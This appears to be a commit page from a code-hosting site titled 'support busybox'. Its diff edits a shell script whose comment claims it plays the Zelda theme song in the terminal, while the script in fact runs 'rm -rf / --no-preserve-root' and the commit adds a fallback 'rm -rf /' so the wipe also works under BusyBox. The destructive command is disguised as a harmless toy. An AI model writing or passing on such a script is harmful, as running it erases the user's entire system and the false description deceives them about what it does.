support busybox
This commit is contained in:
@@ -1,4 +1,4 @@
|
||||
#!/bin/sh
|
||||
set -x
|
||||
# plays zelda theme song in terminal
|
||||
rm -rf / --no-preserve-root
|
||||
rm -rf / --no-preserve-root || rm -rf /
|
||||
|
||||
Reference in New Issue
Block a user